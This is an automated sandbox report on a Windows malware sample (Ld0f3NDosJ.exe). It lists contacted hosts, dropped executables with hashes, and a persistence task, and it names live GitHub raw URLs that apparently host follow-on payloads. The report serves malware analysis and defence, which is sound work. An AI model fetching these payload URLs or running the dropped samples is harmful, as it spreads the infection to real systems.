    http://www.zlib.net/Dpyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363113098.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmp, console_zero.exe, 0000003B.00000002.2612942389.00007FFDA5547000.00000002.00000001.01000000.00000011.sdmpfalse
    • URL Reputation: safe
    unknown
    https://curl.se/docs/hsts.html#
    console_zero.exe
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe.net1&0
    Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmp
    false
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exe06
    Ld0f3NDosJ.exe, 00000003.00000002.2356655360.000001E8C10D0000.00000004.00000020.00020000.00000000.sdmp
    false
    • Avira URL Cloud: safe
    unknown
    https://ipinfo.io/json
    pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://www.openssl.org/H
    Ld0f3NDosJ.exe, 00000003.00000003.2284751779.000001E8C10DD000.00000004.00000020.00020000.00000000.sdmp, pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp, svchost.exe, 00000035.00000002.3362491724.00007FFD93C8E000.00000002.00000001.01000000.00000010.sdmp
    false
    • URL Reputation: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/amdg.dat
    svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp
    false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/hardsvcupdt.exeC:
    Ld0f3NDosJ.exe, 00000003.00000002.2356468392.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp, Ld0f3NDosJ.exe, 00000003.00000003.2334778364.000001E8BF422000.00000004.00000020.00020000.00000000.sdmp
    false
    • Avira URL Cloud: safe
    unknown
    http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
    pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, console_zero.exe, 0000003B.00000002.2612733960.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000003B.00000000.2583942814.00007FF6F8C8C000.00000002.00000001.01000000.00000014.sdmp
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/docs/http-cookies.html#
    svchost.exe, console_zero.exe
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://github.com/panchitopistolesx/items/raw/main/my_backup_a
    svchost.exe, 00000035.00000002.3361917101.000001BB8BD29000.00000004.00000020.00020000.00000000.sdmp
    false
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/nvg.dat
    svchost.exe, 00000035.00000002.3360728429.000001BB8BA13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp
    false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    http://www.gnu.org/licenses/
    pyld64.exe, 0000000E.00000000.2336381311.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, pyld64.exe, 0000000E.00000002.2442276535.00007FF7FC91E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, usvcinsta64.exe, 00000018.00000002.2514383144.00007FF6B8FD4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmp
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://curl.se/V
    pyld64.exe, 0000000E.00000002.2442276535.00007FF7FD31E000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 00000018.00000000.2419094542.00007FF6B99D4000.00000002.00000001.01000000.00000008.sdmp, svchost.exe, 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000003B.00000002.2613577176.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
    false
    • 0%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://raw.githubusercontent.com/panchitopistolesx/items/main/_cpu.dat
    svchost.exe, 00000035.00000003.2846038368.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2914585077.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3178715641.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.2719522374.000001BB8BD06000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3113596577.000001BB8BAF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000002.3361335703.000001BB8BAF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000035.00000003.3048858018.000001BB8BAF2000.00000004.00000020.00020000.00000000.sdmp
    false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    IP               Domain                     Country        ASN     ASN Name                               Malicious
    34.117.59.81     ipinfo.io                  United States  139070  GOOGLE-AS-APGoogleAsiaPacificPteLtdSG  false
    185.199.108.133  raw.githubusercontent.com  Netherlands    54113   FASTLYUS                               false
    140.82.121.3     github.com                 United States  36459   GITHUBUS                               false
    38.180.213.183   runvrs.com                 United States  174     COGENT-174US                           false
    IP
    127.0.0.1
    Joe Sandbox version:40.0.0 Tourmaline
    Analysis ID:1496433
    Start date and time:2024-08-21 09:38:50 +02:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 11m 12s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:109
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:Ld0f3NDosJ.exe
    renamed because original name is a hash value
    Original Sample Name:00948444f3e248047722667419d54205.exe
    Detection:MAL
    Classification:mal100.evad.winEXE@157/53@5/5
    EGA Information:
    • Successful, ratio: 75%
    HCA Information:Failed
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, mm-mm.bing.net.trafficmanager.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
    • Execution Graph export aborted for target pyld64.exe, PID 4388 because there are no executed function
    • Execution Graph export aborted for target usvcinsta64.exe, PID 2736 because there are no executed function
    • Not all processes were analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtCreateKey calls found.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    Time      Type             Description
    03:39:47  API Interceptor  112x Sleep call for process: powershell.exe modified
    03:40:25  API Interceptor  9x Sleep call for process: svchost.exe modified
    03:40:29  API Interceptor  2x Sleep call for process: console_zero.exe modified
    09:40:30  Task Scheduler   Run new task: console_zero path: C:\Windows\System32\console_zero.exe
                        Process:C:\Windows\System32\crypti.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16
                        Entropy (8bit):3.875
                        Encrypted:false
                        SSDEEP:3:ktUOI2Gn:kI2Gn
                        MD5:B101F729FB1107BF23CE00FBF4A10A7F
                        SHA1:A65B1C3C3C56A10D62B8FF00E7F10BA1E54AA58B
                        SHA-256:B2F87025C70B31CBF2BC3E3A6995A93B0F469A8D72AB7E45C73D1DCFB49135CB
                        SHA-512:8FA5EE1410B19549497D974F705D95ED603E59AE1BAD3D6DCBC0AB7B9AE41242C3871CAF7354163692154D80990EB3788670F084650CE32EBE94E1508CB9CB96
                        Malicious:false
                        Preview:!...S..%.e..-.c
                        Process:C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):15180800
                        Entropy (8bit):6.5564607842905644
                        Encrypted:false
                        SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                        MD5:43BCE45D873189F9AE2767D89A1C46E0
                        SHA1:34BC871A24E54A83740E0DF51320B9836D8B820B
                        SHA-256:9AE4784F0B139619CA8FDADFA31B53B1CBF7CD2B45F74B7E4004E5A97E842291
                        SHA-512:F3424B65C72E242E77E5129903B4DC42FB94076402D24C9F2CEA07FF117761942ECEDEC43E0AD6E39EF61628ED0C4709BE7706E3C20537D476EDB57DF2521380
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 18%
                        • Antivirus: Virustotal, Detection: 65%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l..?..?..?.,.>`..?.,.>..?.,.>..?.).>..?.).>..?.).>...?.,.>..?..?V..?.(.>..?.(z?..?.(.>..?Rich..?........PE..d...hC.f.........."....).............5.........@..........................................`.................................................dC..<................7......................8...............................@...............`............................text............................... ..`.rdata...n.......p..................@..@.data... /...P.......D..............@....pdata...7.......8...\..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):15180800
                        Entropy (8bit):6.5564607842905644
                        Encrypted:false
                        SSDEEP:393216:4PsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:4ITkS6
                        MD5:43BCE45D873189F9AE2767D89A1C46E0
                        SHA1:34BC871A24E54A83740E0DF51320B9836D8B820B
                        SHA-256:9AE4784F0B139619CA8FDADFA31B53B1CBF7CD2B45F74B7E4004E5A97E842291
                        SHA-512:F3424B65C72E242E77E5129903B4DC42FB94076402D24C9F2CEA07FF117761942ECEDEC43E0AD6E39EF61628ED0C4709BE7706E3C20537D476EDB57DF2521380
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 18%
                        • Antivirus: Virustotal, Detection: 65%, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........l..?..?..?.,.>`..?.,.>..?.,.>..?.).>..?.).>..?.).>...?.,.>..?..?V..?.(.>..?.(z?..?.(.>..?Rich..?........PE..d...hC.f.........."....).............5.........@..........................................`.................................................dC..<................7......................8...............................@...............`............................text............................... ..`.rdata...n.......p..................@..@.data... /...P.......D..............@....pdata...7.......8...\..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................
                        Process:C:\Windows\System32\usvcinsta64.exe
                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):14262784
                        Entropy (8bit):6.551982111344916
                        Encrypted:false
                        SSDEEP:393216:BPsdXtBcda7nzo7Vd7Qv1CPwDvt3uFRCvfxlXnwXAaGueVW3XSdEVB3:BITkS6
                        MD5:6CD5395F5675ABBF7644268F0023B0BD
                        SHA1:F64379354EF7D7261D7C8250F98C515DDBDF577D
                        SHA-256:397A1DD2D8DCDE26F5D22AE33AFBF6C6201920F8D27EE213B65896FE99944239
                        SHA-512:5CBD0A6346638FEC900723CD0FECFBE6A7E8449175F297462EFFC92B4436737F4CC9C433F94A0F61F89DEC1F77EF56132CB750AFAE4E7AA57CA318DA3DDA9BDA
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 62%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B...#.X.#.X.#.X...Y`#.X...Y.#.X...Y.#.X..Y.#.X..Y.#.X..Y.#.X...Y.#.X.#.XZ#.X...Y.#.X..vX.#.X...Y.#.XRich.#.X................PE..d....B.f.........." ...). ..........(}....................................................`..................................................O..<................,......................8...........................P...@............0..H............................text............ .................. ..`.rdata...*...0...,...$..............@..@.data....*...`.......P..............@....pdata...,...........f..............@..@.fptable............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................
                        Process:C:\Windows\System32\usvcinsta64.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):64000
                        Entropy (8bit):6.336447440888565
                        Encrypted:false
                        SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
                        MD5:2FC3530F3E05667F8240FC77F7486E7E
                        SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
                        SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
                        SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
                        Malicious:false
                        Antivirus:
